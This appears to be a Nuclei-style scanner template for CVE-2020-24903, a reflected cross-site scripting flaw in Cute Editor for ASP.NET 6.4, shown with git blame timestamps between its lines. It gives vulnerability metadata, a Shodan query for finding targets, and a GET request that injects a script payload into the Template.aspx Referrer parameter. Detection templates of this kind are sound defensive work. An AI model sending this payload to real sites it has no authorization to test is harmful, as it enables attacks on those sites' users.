2022-09-30 15:19:39 +00:00
id : CVE-2020-24903
info :
2022-12-09 21:40:18 +00:00
name : Cute Editor for ASP.NET 6.4 - Cross-Site Scripting
2022-09-30 15:19:39 +00:00
author : edoardottt
severity : medium
description : |
2022-12-09 21:40:18 +00:00
Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade to a patched version of Cute Editor for ASP.NET or implement proper input validation to prevent XSS attacks.
2022-09-30 15:19:39 +00:00
reference :
- https://seclists.org/bugtraq/2016/Mar/104
- https://nvd.nist.gov/vuln/detail/CVE-2020-24903
classification :
2022-11-16 09:56:41 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-30 15:19:39 +00:00
cve-id : CVE-2020-24903
2022-11-16 09:56:41 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00246
2023-08-31 11:46:18 +00:00
epss-percentile : 0.61852
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:*
2022-09-30 15:19:39 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:22:36 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : cutesoft
product : cute_editor
2023-09-06 12:22:36 +00:00
framework : asp.net
shodan-query : http.component:"ASP.NET"
2022-12-07 06:02:13 +00:00
tags : cve,cve2020,cuteeditor,xss,seclists
2022-09-30 15:19:39 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-30 15:19:39 +00:00
- method : GET
path :
2022-11-15 15:12:53 +00:00
- '{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script>'
2022-09-30 15:19:39 +00:00
matchers-condition : and
matchers :
- type : word
2022-11-15 15:12:53 +00:00
part : body
2022-09-30 15:19:39 +00:00
words :
2022-11-15 15:12:53 +00:00
- "<script>alert(document.domain)</script></p>"
- "System.Web"
condition : and
2022-09-30 15:19:39 +00:00
- type : word
2022-11-15 15:12:53 +00:00
part : header
2022-09-30 15:19:39 +00:00
words :
2022-11-15 15:12:53 +00:00
- text/html
- type : status
status :
- 200